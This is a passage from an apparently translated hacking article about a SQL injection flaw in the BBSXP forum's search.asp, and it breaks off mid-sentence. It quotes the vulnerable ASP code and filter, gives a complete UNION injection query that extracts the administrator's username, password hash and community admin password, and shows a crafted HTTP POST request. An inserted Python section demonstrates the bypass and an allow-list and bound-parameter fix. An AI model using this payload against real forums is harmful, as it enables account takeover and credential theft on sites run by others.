BBSXP injection vulnerability
A new BBSXP injection vulnerability reappears; the administrator account password can be obtained directly
-- I found a summary of the BBSXP5 SP1 vulnerability
There was an article about BBSXP in the early days of the magazine. It was a cookie injection attack. The author was ingenious and could think of a logical loophole.
After reading the article at school, I did not read the code. Having nothing to do during the summer vacation, I downloaded the latest version of BBSXP and read it.
BBSXP is really small and its files are short, but it is a bit different from DVBBS, whether in function or in interface.
But it does have a few flaws, after three years of testing.
One. Search for loopholes
BBSXP converts string input with HTMLEncode, and handles numeric input with the int function and IsNumeric checks.
Obviously, a query also contains parts that are neither numbers nor strings and must not be taken as input values. If something cannot be a value, why accept it as input?
That is the crux of the matter. I scanned each file with this idea, and it took a long time to get to search.asp (it seems to have had a loophole before; the original was fixed but there is a new one), where I found a loophole. Let's look at the code together.
<!-- #include file="setup.asp" -->
<%
top
if Request.Cookies("username")=empty then error("<li>you haven't <a href=login.asp>login")
DetectPost
if Request("menu")="ok" then
search=Request("search")
forumid=Request("forumid")
TimeLimit=Request("TimeLimit")
' String inputs pass through the HTMLEncode filter
content=HTMLEncode(Request("content"))
searchxm=HTMLEncode(Request("searchxm"))
searchxm2=HTMLEncode(Request("searchxm2"))
searchxm2=replace(searchxm2,"@","&")
if content=empty then content=Request.Cookies("username")
if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"
' searchxm / searchxm2 are used as column names, outside any quotes
if search="author" then
item=""&searchxm&"='"&content&"'"
elseif search="key" then
item=""&searchxm2&" like '%"&content&"%'"
end if
if TimeLimit<>"" then TimeLimitList="and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""
sql="select top "&MaxSearch&" * from forum where deltopic<>1 and "&forumidor&" "&item&" "&TimeLimitList&" order by lasttime Desc"
Rs.Open sql,Conn,1
......
Let's take a closer look at the sql="select top "&MaxSearch... statement. MaxSearch is defined elsewhere, with a default value of 500, which leaves three variables that come from outside.
1. if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"
As long as the forumid input is empty, forumidor is empty.
2. if TimeLimit<>"" then TimeLimitList="and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""
TimeLimit is an integer; if we enter 1, TimeLimitList becomes "and lasttime>now()-1",
or "and lasttime>getdate()-1" in MSSQL.
3. if search="author" then
item=""&searchxm&"='"&content&"'"
elseif search="key" then
item=""&searchxm2&" like '%"&content&"%'"
end if
As long as search="author" and content is arbitrary input (say abcd), item becomes [HTMLEncode(searchxm)]='abcd'.
Once we construct the input and it passes through the statements above, the SQL statement becomes:
select top 500 * from forum where deltopic<>1 and [HTMLEncode(searchxm)]='abcd' and lasttime>now()-1 order by lasttime Desc
The part enclosed in square brackets has no single quotes around it, so obviously it can be exploited.
Let's look at the HTMLEncode function first:
function HTMLEncode(fString)
fString=replace(fString,";","&#59;")
fString=server.htmlencode(fString)
fString=replace(fString,"'","&#39;")
fString=replace(fString,"--","&#45;&#45;")
fString=replace(fString,"\","&#92;")
fString=replace(fString,vbCrlf,"<br>")
HTMLEncode=fString
end function
Everything that should be filtered is filtered, and the filtering is very tight. It is hard on the programmer too: filter any more and it would likely affect usability.
There are few security problems left. So how do we get past this filter? Naturally, you could guess.
That is a feasible method; the structure of the table is known, so it is easy to guess. But I'll do it in a simple way.
Two. Exploit
A familiar union query works here, and it is valid for both ACCESS and MSSQL. I'm not going to walk through writing it; I'll just show you the result.
select top 500 * from forum where deltopic<>1 and
forumid=0 union all select top 1 1,1,[user].username as topic,forum.username,content,forum.posttime,forum.postip,1,1,1,1,1,1,1,[user].userpass as lastname,lasttime,polltopic,clubconfig.adminpassword as pollresult,1 from
[user],forum,clubconfig where [user].membercode=5 or forum.id=0 or clubconfig.adminpassword
='abcd' and lasttime>now()-1 order by lasttime Desc
The colored part is the value of searchxm we want to enter; none of the characters in it are filtered by the HTMLEncode function.
The meaning of this statement is that the part in front of the union is false, because forumid cannot be 0, so the union only returns one record, which contains the administrator's user name and encrypted password, as well as the encrypted password for community management.
Anyone who knows SQL will see it.
The number 1 has no meaning of its own; it is only there to match the fields, ensuring that the number and types of fields before and after the union are consistent.
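As an added example (not code from the original article or from BBSXP), the Python sketch below ports the HTMLEncode filter to show why it leaves a searchxm value of this kind untouched, then shows the allow-list plus bound-parameter form that closes the hole. The use of html.escape in place of Server.HTMLEncode, the AUTHOR_COLUMNS set, the sample table and the PROBE string are assumptions constructed for illustration.

```python
import html
import sqlite3

def bbsxp_htmlencode(s: str) -> str:
    """Port of the HTMLEncode filter above; html.escape plus a quote
    replacement stands in for Server.HTMLEncode (assumption)."""
    s = s.replace(";", "&#59;")
    s = html.escape(s, quote=False).replace('"', "&quot;")
    s = s.replace("'", "&#39;").replace("--", "&#45;&#45;")
    s = s.replace("\\", "&#92;")
    return s.replace("\r\n", "<br>")

def item_vulnerable(searchxm: str, content: str) -> str:
    # Same shape as search.asp: searchxm sits in identifier position,
    # outside any quotes, so escaping value characters does not confine it.
    return f"{bbsxp_htmlencode(searchxm)}='{bbsxp_htmlencode(content)}'"

# Assumed allow-list: forum columns an author search may target.
AUTHOR_COLUMNS = {"username", "lastname"}

def item_hardened(searchxm: str, content: str):
    # Identifiers cannot be bound as parameters, so they are picked from
    # a fixed set; the value travels as a bound parameter.
    if searchxm not in AUTHOR_COLUMNS:
        raise ValueError("unsupported search field: %r" % searchxm)
    return f"{searchxm} = ?", (content,)

def search(conn, searchxm, content):
    clause, params = item_hardened(searchxm, content)
    sql = ("select topic from forum where deltopic <> 1 and "
           + clause + " order by lasttime desc")
    return [row[0] for row in conn.execute(sql, params)]

def demo_db():
    # Constructed sample data, not from the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table forum (topic, username, lastname,"
                 " deltopic, lasttime)")
    conn.execute("insert into forum values ('hello', 'alice', 'bob', 0, 1)")
    return conn

# Constructed probe using only characters the filter leaves alone.
PROBE = "forumid=0 union all select [user].userpass from [user] where topic"

if __name__ == "__main__":
    print(item_vulnerable(PROBE, "abcd"))   # probe survives the filter intact
    print(search(demo_db(), "username", "alice"))
```

The filter does its job on values (quotes, semicolons and comment markers are encoded), but a column name needs validation against a fixed set, not escaping.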
Here you can construct your own queries; I am only giving you a reference.
With the input statement constructed, construct the submission. Think of the classic WSE; if anyone thinks they can write the HTTP submission string by hand,
I would advise them to save their energy and brain power.
(figure 1)
The construction is submitted as follows:
POST /BBSXP/search.asp?menu=ok HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost:8000/bbsxp/search.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost:8000
Content-Length: 481
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: eremite=0; userpass=E80B5017098950FC58AAD83C8C14978E; username=admin; skins=1; ASPSESSIONIDSSRQSDTB=OGLJMADCECKAFKGCPCCHBKHO; Onlinetime=2d8%2004%2d13+2004%3a08%3a33; addmin=0
I've written an HTML page for the searchxm part, which can be